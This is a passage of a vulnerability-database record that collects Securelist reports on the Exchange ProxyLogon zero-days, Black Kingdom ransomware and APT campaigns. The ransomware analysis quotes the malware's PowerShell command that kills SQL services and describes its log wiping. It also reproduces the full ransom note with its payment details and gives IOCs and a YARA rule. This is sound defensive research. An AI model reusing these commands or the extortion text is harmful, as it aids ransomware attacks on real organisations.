"MS:CVE-2021-34473", "MS:CVE-2021-34523"]}, {"type": "mskb", "idList": ["KB5001779", "KB5004779"]}, {"type": "msrc", "idList": ["MSRC:ED939F90BDE8D7A32031A750388B03C9"]}, {"type": "mssecure", "idList": ["MSSECURE:28641FE2F73292EB4B26994613CC882B", "MSSECURE:2FB5327A309898BD59A467446C9C36DC", "MSSECURE:4A6B394DCAF12E05136AE087248E228C", "MSSECURE:E537BA51663A720821A67D2A4F7F7F0E", "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3"]}, {"type": "nessus", "idList": ["EXCHANGE_CVE-2021-26855.NBIN", "HAFNIUM_IOC_DETECT.NBIN", "SMB_NT_MS21_APR_EXCHANGE.NASL", "SMB_NT_MS21_JUL_EXCHANGE.NASL", "SMB_NT_MS21_MAR_EXCHANGE_2010_OOB.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161806", "PACKETSTORM:161846", "PACKETSTORM:161938", "PACKETSTORM:162610", "PACKETSTORM:162736", "PACKETSTORM:163895"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840", "QUALYSBLOG:8DC9B53E981BBE193F6EC369D7FA85F8"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:24E0BE5176F6D3963E1824AD4A55019E", "RAPID7BLOG:4B35B23167A9D5E016537F6A81E4E9D4", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:6A1F743B64899419F505BFE243BD179F", "RAPID7BLOG:6C0062981975551A3565CCAD248A1573", "RAPID7BLOG:7B1DD656DC72802EE7230867267A5A16", "RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53", "RAPID7BLOG:A567BCDA66AFFA88D0476719CB5D934D", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:F216985E1720C28CCE9E1F41AD704502"]}, {"type": "saint", "idList": ["SAINT:192E33BC51A49F81EC3C52F0E8A72432", "SAINT:8E748D4A2FD6DFA108D87FF09FFEF2AE"]}, {"type": "securelist", "idList": ["SECURELIST:322E7EEAE549CDB14513C2EDB141B8BA", "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "SECURELIST:A823F31C04C74DD103337324E6D218C9"]}, {"type": "seebug", "idList": ["SSV:99334"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965"]}, {"type": "thn", "idList": ["THN:5BE77895D84D1FB816C73BB1661CE8EB", "THN:814DFC4A310E0C39823F3110B0457F8C", "THN:9AB21B61AFE09D4EEF533179D0907C03", "THN:9DB02C3E080318D681A9B33C2EFA8B73", "THN:9FD8A70F9C17C3AF089A104965E48C95", "THN:A73831555CB04403ED3302C1DDC239B1", "THN:ABF9BC598B143E7226083FE7D2952CAE", "THN:B95DC27A89565323F0F8E6350D24D801", "THN:BC8A83422D35DB5610358702FCB4D154"]}, {"type": "threatpost", "idList": ["THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:18C67680771D8DB6E95B3E3C7854114F", "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "THREATPOST:2FE0A6568321CDCF2823C6FA18106381", "THREATPOST:34CC110D7F26B1B4D3B97BE05F000B69", "THREATPOST:4B2E19CAF27A3EFBCB2F777C6E528317", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "THREATPOST:83C349A256695022C2417F465CEB3BB2", "THREATPOST:8D6D4C10987CBF3434080EFF240D2E74", "THREATPOST:98D815423018872E6E596DAA8131BF3F", "THREATPOST:9AF5E0BBCEF3F8F871ED50F3A8A604A9", "THREATPOST:A4C1190B664DAE144A62459611AC5F4A", "THREATPOST:B787E57D67AB2F76B899BCC525FF6870", "THREATPOST:BADA213290027D414693E838771F8645", "THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:DC270F423257A4E0C44191BE365F25CB"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:1493380EEC54B493CC22B4FA116139BB"]}, {"type": "zdi", "idList": ["ZDI-21-819", "ZDI-21-821", "ZDI-21-822"]}, {"type": "zdt", "idList": ["1337DAY-ID-36262", "1337DAY-ID-36281", "1337DAY-ID-36667"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-26855", "epss": "0.975430000", "percentile": "0.999880000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26857", "epss": "0.053690000", "percentile": "0.918940000", "modified": "2023-03-17"}, {"cve": "CVE-2021-26858", "epss": "0.106070000", "percentile": "0.940930000", "modified": "2023-03-17"}, {"cve": "CVE-2021-27065", "epss": "0.943940000", "percentile": "0.986930000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31195", "epss": "0.965910000", "percentile": "0.993170000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31196", "epss": "0.019960000", "percentile": "0.870330000", "modified": "2023-03-17"}, {"cve": "CVE-2021-31207", "epss": "0.971850000", "percentile": "0.996460000", "modified": "2023-03-17"}, {"cve": "CVE-2021-33768", "epss": "0.000430000", "percentile": "0.073630000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34473", "epss": "0.974090000", "percentile": "0.998460000", "modified": "2023-03-17"}, {"cve": "CVE-2021-34523", "epss": "0.975070000", "percentile": "0.999600000", "modified": "2023-03-17"}], "vulnersScore": 0.1}, "_state": {"dependencies": 1659988328, "score": 1698842854, "epss": 1679109163}, "_internal": {"score_hash": "280f231e34140808939f482327bb0c68"}}
{"securelist": [{"lastseen": "2021-03-10T12:32:23", "description": "\n\n## What happened?\n\nOn March 2, 2021 several companies [released](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) [reports](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) about in-the-wild exploitation of zero-day vulnerabilities inside Microsoft Exchange Server. The following vulnerabilities allow an attacker to compromise a vulnerable Microsoft Exchange Server. As a result, an attacker will gain access to all registered email accounts, or be able to execute arbitrary code (remote code execution or RCE) within the Exchange Server context. In the latter case, the attacker will also be able to achieve persistence on the infected server.\n\nA total of four vulnerabilities were uncovered:\n\n 1. [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>). Server-side request forgery (SSRF) allows an attacker without authorization to query the server with a specially constructed request that will cause remote code execution. The exploited server will then forward the query to another destination. \n 2. [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) caused by unsafe data deserialization inside the Unified Messaging service. Potentially allows an attacker to execute arbitrary code (RCE). As a result of insufficient control over user files, an attacker is able to forge a body of data query, and trick the high-privilege service into executing the code.\n 3. [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>). This vulnerability allows an authorized Exchange user to overwrite any existing file inside the system with their own data. To do so, the attacker has to compromise administrative credentials or exploit another vulnerability such as SSRF CVE-2021-26855.\n 4. [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) is similar to CVE-2021-26858 and allows an authorized attacker to overwrite any system file on the Exchange server. \n\nKaspersky [Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) shows that these vulnerabilities are already used by cybercriminals around the world.\n\n_Geography of attacks with mentioned MS Exchange vulnerabilities (based on KSN statistics) ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>))_\n\nWe predict with a high degree of confidence that this is just the beginning, and we anticipate numerous exploitation attempts with the purpose of gaining access to resources inside corporate perimeters. Furthermore, we should note that there is typically a high risk of [ransomware](<https://securelist.com/targeted-ransomware-encrypting-data/99255/>) infection and/or data theft connected to such attacks. \n\n## How to protect against this threat?\n\nOur products protect against this threat with [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components and detect exploitation with the following verdict: PDM:Exploit.Win32.Generic \nWe detect the relevant exploits with the following detection names:\n\n * Exploit.Win32.CVE-2021-26857.gen\n * HEUR:Exploit.Win32.CVE-2021-26857.a\n\nWe also detect and block the payloads (backdoors) being used in the exploitation of these vulnerabilities, according to our Threat Intelligence. Possible detection names are (but not limited to):\n\n * HEUR:Trojan.ASP.Webshell.gen\n * HEUR:Backdoor.ASP.WebShell.gen\n * UDS:DangerousObject.Multi.Generic\n\nWe are actively monitoring the situation and additional detection logic will be released with updatable databases when required.\n\nOur [Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) helps to identify attacks in early stages by marking such suspicious actions with special IoA tags (and creating corresponding alerts). For example, this is an example of Powershell started by IIS Worker process (w3wp.exe) as a result of vulnerability exploitation: \n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/07094546/microsoft_exchange_expoit_edr.png>)\n\nOur [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service is also able to identify and stop this attack by using threat hunting rules to spot the exploitation itself, as well as possible payload activity.\n\nAnd the thorough research of the attack will soon be available within APT Intelligence Reporting service, please contact [intelreports@kaspersky.com](<mailto:intelreports@kaspersky.com>) for details.\n\n## Recommendations\n\n * As Microsoft has already released an update to fix all these vulnerabilities, we strongly recommend updating Exchange Server as soon as possible.\n * Focus your defense strategy on detecting lateral movements and data exfiltration to the internet. Pay special attention to outgoing traffic to detect cybercriminal connections. Back up data regularly. Make sure you can quickly access it in an emergency.\n * Use solutions like [Kaspersky Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>) and the [Kaspersky Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service which help to identify and stop the attack in the early stages, before the attackers achieve their goals.\n * Use a reliable endpoint security solution such as Kaspersky Endpoint Security for Business that is powered by exploit prevention, behavior detection and a remediation engine that is able to roll back malicious actions. KESB also has self-defense mechanisms that can prevent its removal by cybercriminals.", "cvss3": {}, "published": "2021-03-04T17:20:57", "type": "securelist", "title": "Zero-day vulnerabilities in Microsoft Exchange Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-04T17:20:57", "id": "SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4", "href": "https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-06-17T10:31:39", "description": "\n\nBlack Kingdom ransomware appeared on the scene back in 2019, but we observed some activity again in 2021. The ransomware was used by an unknown adversary for exploiting a Microsoft Exchange vulnerability (CVE-2021-27065).\n\nThe complexity and sophistication of the Black Kingdom family cannot bear a comparison with other Ransomware-as-a-Service (RaaS) or Big Game Hunting (BGH) families. The ransomware is coded in Python and compiled to an executable using PyInstaller; it supports two encryption modes: one generated dynamically and one using a hardcoded key. Code analysis revealed an amateurish development cycle and a possibility to recover files encrypted with Black Kingdom with the help of the hardcoded key. The industry already [provided a script](<https://blog.cyberint.com/black-kingdom-ransomware>) to recover encrypted files in case they were encrypted with the embedded key.\n\n## Background\n\nThe use of a ransomware family dubbed Black Kingdom in a campaign that exploited the CVE-2021-27065 Microsoft Exchange vulnerability known as [ProxyLogon](<https://proxylogon.com/>) was [publicly reported](<https://twitter.com/vikas891/status/1373282066603859969>) at the end of March.\n\nAround the same time, we published a story on another ransomware family used by the attackers after successfully exploiting vulnerabilities in Microsoft Exchange Server. The ransomware family was DearCry.\n\nAnalysis of Black Kingdom revealed that, compared to others, it is an amateurish implementation with several mistakes and a critical encryption flaw that could allow decrypting the files due to the use of a hardcoded key. Black Kingdom is not a new player: it was observed in action following other vulnerability exploitations in 2020, such as CVE-2019-11510.\n\n**Date** | **CVE** | **Product affected** \n---|---|--- \nJune 2020 | CVE-2019-11510 | Pulse Secure \nMarch 2021 | CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065 | Microsoft Exchange Server \n \n## Technical analysis\n\n### Delivery methods\n\nBlack Kingdom's past activity indicates that ransomware was used in larger vulnerability exploitations campaigns related to Pulse Secure or Microsoft Exchange. [Public reports](<https://twitter.com/malwaretechblog/status/1373648027609657345>) indicated that the adversary behind the campaign, after successfully exploiting the vulnerability, installed a webshell in the compromised system. The webshell enabled the attacker to execute arbitrary commands, such as a PowerShell script for downloading and running the Black Kingdom executable.\n\n### Sleep parameters\n\nThe ransomware can be executed without parameters and will start to encrypt the system, however, it is possible to to run Black Kingdom with a number value, which it will interpret as the number of seconds to wait before starting encryption.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141438/BlackKingdom_ransomware_01.png>)\n\n**_'Sleep' parameter used as an argument_**\n\n### Ransomware is written in Python\n\nBlack Kingdom is coded in Python and compiled to an executable using PyInstaller. While analyzing the code statically, we found that most of the ransomware logic was coded into a file named _0xfff.py_. The ransomware is written in Python 3.7.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141523/BlackKingdom_ransomware_02.png>)\n\n**_Black Kingdom is coded in Python_**\n\n### Excluded directories\n\nThe adversary behind Black Kingdom specified certain folders to be excluded from encryption. The purpose is to avoid breaking the system during encryption. The list of excluded folders is available in the code:\n\n * Windows,\n * ProgramData,\n * Program Files,\n * Program Files (x86),\n * AppData/Roaming,\n * AppData/LocalLow,\n * AppData/Local.\n\nThe code that implements this functionality demonstrates how amateurishly Black Kingdom is written. The developers failed to use OS environments or regex to avoid repeating the code twice.\n\n### PowerShell command for process termination and history deletion\n\nPrior to file encryption, Black Kingdom uses PowerShell to try to stop all processes in the system that contain "sql" in the name with the following command:\n \n \n Get-Service*sql*|Stop-Service-Force2>$null\n\nOnce done, Black Kingdom will delete the PowerShell history in the system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141650/BlackKingdom_ransomware_03.png>)\n\n**_PowerShell commands run by Black Kingdom_**\n\nCombined with a cleanup of system logs, this supports the theory that the attackers try to remain hidden in the system by removing all traces of their activity.\n\n### Encryption process\n\nThe static analysis of Black Kingdom shows how it generates an AES-256 key based on the following algorithm.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141733/BlackKingdom_ransomware_04.png>)\n\n**_The pseudo-algorithm used by Black Kingdom_**\n\nThe malware generates a 64-character pseudo-random string. It then takes the MD5 hash of the string and uses it as the key for AES-256 encryption.\n\nThe code contains credentials for sending the generated key to the third-party service hxxp://mega.io. If the connection is unsuccessful, the Black Kingdom encrypts the data with a hardcoded key available in the code.\n\nBelow is an example of a successful connection with hxxp://mega.io.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16141817/BlackKingdom_ransomware_05.png>)\n\n**_Connection established with mega.io_**\n\n** **The credentials for mega.io are hardcoded in base64 and used for connecting as shown below.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143025/BlackKingdom_ransomware_06.png>)\n\n**_Hardcoded credentials_**\n\nThe file sent to Mega contained the following data.\n\n**Parameter** | **Description:** \n---|--- \nID: | Generated ID for user identification \nKey: | Generated user key \nUser: | Username in the infected system \nDomain: | Domain name to which the infected user belongs \n \nBlack Kingdom will encrypt a single file if it is passed as a parameter with the key to encrypt it. This could allow the attacker to encrypt one file instead of encrypting the entire system.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143102/BlackKingdom_ransomware_07.png>)\n\n**_Function for encrypting a single file_**\n\nIf no arguments are used, the ransomware will start to enumerate files in the system and then encrypt these with a ten-threaded process. It performs the following basic operations:\n\n 1. Read the file,\n 2. Overwrite it with an encrypted version,\n 3. Rename the file.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143137/BlackKingdom_ransomware_08.png>)\n\n**_The function used for encrypting the system_**\n\nBlack Kingdom allows reading a file in the same directory called target.txt, which will be used by the ransomware to recursively collect files for the collected directories specified in that file and then encrypt them. Black Kingdom will also enumerate various drive letters and encrypt them. A rescue note will be delivered for each encrypted directory.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143222/BlackKingdom_ransomware_09.png>)\n\n**_Rescue note used by the ransomware_**\n\n### Encryption mistakes\n\nAmateur ransomware developers often end up making mistakes that can help decryption, e.g., poor implementation of the encryption key, or, conversely, make recovery impossible even after the victim pays for a valid decryptor. Black Kingdom will try to upload the generated key to Mega, and if this fails, use a hardcoded key to encrypt the files. If the files have been encrypted and the system has not been able to make a connection to Mega, it will be possible to recover the files using the hardcoded keys.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143256/BlackKingdom_ransomware_10.png>)\n\n**_Hardcoded key in Base64_**\n\nWhile analyzing the code statically, we examined the author's implementation of file encryption and found several mistakes that could affect victims directly. During the encryption process, Black Kingdom does not check whether the file is already encrypted or not. Other popular ransomware families normally add a specific extension or a marker to all encrypted files. However, if the system has been infected by Black Kingdom twice, files in the system will be encrypted twice, too, which may prevent recovery with a valid encryption key.\n\n### System log cleanup\n\nA feature of Black Kingdom is the ability to clean up system logs with a single Python function.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143334/BlackKingdom_ransomware_11.png>)\n\n**_The function that cleans up system logs_**\n\nThis operation will result in Application, Security, and System event viewer logs being deleted. The purpose is to remove any history of ransomware activity, exploitation, and privilege escalation.\n\n### Ransomware note\n\nBlack Kingdom changes the desktop background to a note that the system is infected while it encrypts files, disabling the mouse and keyboard with pyHook as it does so.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143409/BlackKingdom_ransomware_12.png>)\n\n**_Function to hook the mouse and keyboard_**\n\nWritten in English, the note contains several mistakes. All Black Kingdom notes contain the same Bitcoin address; sets it apart from other ransomware families, which provide a unique address to each victim.\n \n \n ***************************\n | We Are Back ?\n ***************************\n \n We hacked your (( Network )), and now all files, documents, images,\n databases and other important data are safely encrypted using the strongest algorithms ever.\n You cannot access any of your files or services .\n But do not worry. You can restore everthing and get back business very soon ( depends on your actions )\n \n before I tell how you can restore your data, you have to know certain things :\n \n We have downloaded most of your data ( especially important data ) , and if you don't contact us within 2 days, your data will be released to the public.\n \n To see what happens to those who didn't contact us, just google : ( Blackkingdom Ransomware )\n \n ***************************\n | What guarantees ?\n ***************************\n \n We understand your stress and anxiety. So you have a free opportunity to test our service by instantly decrypting one or two files for free\n just send the files you want to decrypt to (support_blackkingdom2@protonmail.com\n \n ***************************************************\n | How to contact us and recover all of your files ?\n ***************************************************\n \n The only way to recover your files and protect from data leaks, is to purchase a unique private key for you that we only posses .\n \n \n [ + ] Instructions:\n \n 1- Send the decrypt_file.txt file to the following email ===> support_blackkingdom2@protonmail.com\n \n 2- send the following amount of US dollars ( 10,000 ) worth of bitcoin to this address :\n \n [ 1Lf8ZzcEhhRiXpk6YNQFpCJcUisiXb34FT ]\n \n 3- confirm your payment by sending the transfer url to our email address\n \n 4- After you submit the payment, the data will be removed from our servers, and the decoder will be given to you,\n so that you can recover all your files.\n \n ## Note ##\n \n Dear system administrators, do not think you can handle it on your own. Notify your supervisors as soon as possible.\n By hiding the truth and not communicating with us, what happened will be published on social media and yet in news websites.\n \n Your ID ==>\n FDHJ91CUSzXTquLpqAnP\n\nThe associated Bitcoin address is currently showing just two transactions.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/06/16143451/BlackKingdom_ransomware_13.png>)\n\n**_Transactions made to a Bitcoin account_**\n\n### Code analysis\n\nAfter decompiling the Python code, we found that the code base for Black Kingdom has its origins in an open-source ransomware builder [available on Github](<https://github.com/BuchiDen/Ransomware_RAASNet/blob/master/RAASNet.py>).\n\nThe adversary behind Black Kingdom adapted parts of the code, adding features that were not originally presented in the builder, such as the hardcoded key or communication with the mega.io domain.\n\n## Victims\n\nBased on our telemetry we could see only a few hits by Black Kingdom in Italy and Japan.\n\n## Attribution\n\nWe could not attribute Black Kingdom to any known adversary in our case analysis. Its involvement in the Microsoft Exchange exploitation campaign suggests opportunism, rather than a resurgence in activity from this ransomware family.\n\nFor more information please contact: [financialintel@kaspersky.com](<mailto:financialintel@kaspersky.com>)\n\n## Appendix I \u2013 Indicators of Compromise\n\n**_Note:_**_ The indicators in this section were valid at the time of publication. Any future changes will be directly updated in the corresponding .ioc file._\n\n**File Hashes**\n\nb9dbdf11da3630f464b8daace88e11c374a642e5082850e9f10a1b09d69ff04f \nc4aa94c73a50b2deca0401f97e4202337e522be3df629b3ef91e706488b64908 \na387c3c5776ee1b61018eeb3408fa7fa7490915146078d65b95621315e8b4287 \n815d7f9d732c4d1a70cec05433b8d4de75cba1ca9caabbbe4b8cde3f176cc670 \n910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db \n866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc \nc25a5c14269c990c94a4a20443c4eb266318200e4d7927c163e0eaec4ede780a\n\n**Domain:**\n\nhxxp://yuuuuu44[.]com/vpn-service/$(f1)/crunchyroll-vpn\n\n**YARA rules:**\n \n \n import \"hash\"\n import \"pe\"\n rule ransomware_blackkingdom {\n \n meta:\n \n description = \"Rule to detect Black Kingdom ransomware\"\n author = \"Kaspersky Lab\"\n copyright = \"Kaspersky Lab\"\n distribution = \"DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM\"\n version = \"1.0\"\n last_modified = \"2021-05-02\"\n hash = \"866b1f5c5edd9f01c5ba84d02e94ae7c1f9b2196af380eed1917e8fc21acbbdc\"\n hash = \"910fbfa8ef4ad7183c1b5bdd3c9fd1380e617ca0042b428873c48f71ddc857db\"\n \n condition:\n \n hash.sha256(pe.rich_signature.clear_data) == \"0e7d0db29c7247ae97591751d3b6c0728aed0ec1b1f853b25fc84e75ae12b7b8\"\n }\n\n## Appendix II \u2013 MITRE ATT&CK Mapping\n\nThis table contains all TTPs identified during the analysis of the activity described in this report.\n\n**Tactic** | **Technique.** | **Technique Name. ** \n---|---|--- \n**Execution** | **T1047** | **Windows Management Instrumentation** \n**T1059** | **Command and Scripting Interpreter** \n**T1106** | **Native API** \n**Persistence** | **T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Privilege Escalation** | **T1055** | **Process Injection** \n**T1574.002** | **DLL Side-Loading** \n**T1546.011** | **Application Shimming** \n**T1134** | **Access Token Manipulation** \n**T1547.001** | **Registry Run Keys / Startup Folder** \n**Defense Evasion** | **T1562.001** | **Disable or Modify Tools** \n**T1140** | **Deobfuscate/Decode Files or Information** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1027** | **Obfuscated Files or Information** \n**T1574.002** | **DLL Side-Loading** \n**T1036** | **Masquerading** \n**T1134** | **Access Token Manipulation** \n**T1055** | **Process Injection** \n**Credential Access** | **T1056** | **Input Capture** \n**Discovery** | **T1083** | **File and Directory Discovery** \n**T1082** | **System Information Discovery** \n**T1497** | **Virtualization/Sandbox Evasion** \n**T1012** | **Query Registry** \n**T1518.001** | **Security Software Discovery** \n**T1057** | **Process Discovery** \n**T1018** | **Remote System Discovery** \n**T1016** | **System Network Configuration Discovery** \n**Collection** | **T1560** | **Archive Collected Data** \n**T1005** | **Data from Local System** \n**T1114** | **Email Collection** \n**T1056** | **Input Capture** \n**Command and Control** | **T1573** | **Encrypted Channel** \n**Impact** | **T1486** | **Data Encrypted for Impact**", "cvss3": {}, "published": "2021-06-17T10:00:41", "type": "securelist", "title": "Black Kingdom ransomware", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-06-17T10:00:41", "id": "SECURELIST:DF3251CC204DECD6F24CA93B7A5701E1", "href": "https://securelist.com/black-kingdom-ransomware/102873/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-05-31T11:03:47", "description": "\n\n## Targeted attacks\n\n### Putting the 'A' into APT\n\nIn December, SolarWinds, a well-known IT managed services provider, fell victim to a sophisticated supply-chain attack. The company's Orion IT, a solution for monitoring and managing customers' IT infrastructure, was compromised by threat actors. This resulted in the deployment of a custom backdoor, named Sunburst, on the networks of more than 18,000 SolarWinds customers, including many large corporations and government bodies, in North America, Europe, the Middle East and Asia.\n\nOne thing that sets this campaign apart from others, is the peculiar victim profiling and validation scheme. Out of the 18,000 Orion IT customers affected by the malware, it seems that only a handful were of interest to the attackers. This was a sophisticated attack that employed several methods to try to remain undetected for as long as possible. For example, before making the first internet connection to its C2s, the Sunburst malware lies dormant for up to two weeks, preventing easy detection of this behaviour in sandboxes. In [our initial report on Sunburst](<https://securelist.com/sunburst-connecting-the-dots-in-the-dns-requests/99862/>), we examined the method used by the malware to communicate with its C2 (command-and-control) server and the protocol used to upgrade victims for further exploitation.\n\nFurther investigation of the Sunburst backdoor revealed several [features that overlap with a previously identified backdoor known as Kazuar](<https://securelist.com/sunburst-backdoor-kazuar/99981/>), a .NET backdoor first reported in 2017 and tentatively linked to the Turla APT group.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/01/08095035/Sunburst_backdoor_Kazuar_01.png>)\n\nThe shared features between Sunburst and Kazuar include the victim UID generation algorithm, code similarities in the initial sleep algorithm and the extensive usage of the FNV1a hash to obfuscate string comparisons. There are several possibilities: Sunburst may have been developed by the same group as Kazuar; the developers of Sunburst may have adopted some ideas or code from Kazuar; both groups obtained their malware from the same source; some Kazuar developers moved to another team, taking knowledge and tools with them; or the developers of Sunburst introduced these links as a form of false flag. Hopefully, further analysis will make things clearer.\n\n### Lazarus targets the defence industry\n\nWe have observed numerous activities of the Lazarus group over many years, with the threat actor changing targets depending on its objectives. Over the last two years, we have tracked Lazarus's use of ThreatNeedle, an advanced malware cluster of Manuscrypt (aka NukeSped), to target several industries. While investigating [attacks on the defense industry](<https://securelist.com/lazarus-threatneedle/100803/>) in mid-2020, we were able to observe the complete life-cycle of an attack, uncovering more technical details and links to the group's other campaigns.\n\nLazarus made use of COVID-19 themes in its spear-phishing emails, embellishing them with personal information gathered using publicly available sources. Once the victim opens an infected document and agrees to enable macros, the malware is dropped onto the system and proceeds to a multi-stage deployment procedure.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145116/lazarus_threatneedle_07.png>)\n\nAfter gaining an initial foothold, the attackers gathered credentials and moved laterally, seeking crucial assets in the victim's environment. They overcame network segmentation by gaining access to an internal router machine and configuring it as a proxy server, allowing them to exfiltrate stolen data from the victim's intranet to their remote server.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24163703/lazarus_threatneedle_09.png>)[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/24164015/lazarus_threatneedle_12.png>)\n\nWe have been tracking ThreatNeedle malware for more than two years and are highly confident that this malware cluster is attributed only to the Lazarus group. During this investigation, we were able to find connections to several other clusters belonging to the Lazarus group.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/02/18145822/lazarus_threatneedle_19.png>)\n\n### MS Exchange zero-day vulnerabilities exploited in the wild\n\nOn March 2, Microsoft released [out-of-band patches for four zero-day vulnerabilities in Exchange Server](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>) that are being actively exploited in the wild (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065). The vulnerabilities allow an attacker to gain access to an Exchange server, create a web shell for remote server access and steal data from the victim's network.\n\nMicrosoft attributed the attacks to a threat actor called Hafnium, although other researchers have reported that there are also [other groups exploiting the vulnerabilities to launch attacks](<https://threatpost.com/microsoft-exchange-servers-apt-attack/164695/>).\n\nOur [threat intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>) indicates that companies across the globe have been targeted in attacks that exploit these vulnerabilities \u2013 with the greatest focus on Europe and the US.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2021/03/04171325/microsoft_exchange_expoit_map.png>)Kaspersky products protect against this threat with [behavior-based detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [exploit prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) components. We also detect and block the backdoors used in the exploitation of these vulnerabilities. Our EDR ([Endpoint Detection and Response](<https://www.kaspersky.com/enterprise-security/endpoint-detection-response-edr>)) solution helps to identify attacks in the early stages by marking suspicious actions with special IoA (Indicators of Attack) tags and by creating corresponding alerts.\n\nOur recommendations for staying safe from attacks using these vulnerabilities can be found [here](<https://securelist.com/zero-day-vulnerabilities-in-microsoft-exchange-server/101096/>).\n\n### Ecipekac: sophisticated multi-layered loader discovered in A41APT campaign\n\nA41APT is a long-running campaign, active from March 2019 to the end of December 2020, that has targeted multiple industries, including Japanese manufacturing and its overseas bases. We believe, with high confidence, that the threat actor behind this campaign is APT10.\n\nOne particular piece of malware from this campaign is called Ecipekac (aka DESLoader, SigLoader, and HEAVYHAND). It is a very sophisticated multi-layer loader module used to deliver payloads such as SodaMaster, P8RAT, and FYAnti which in turn loads 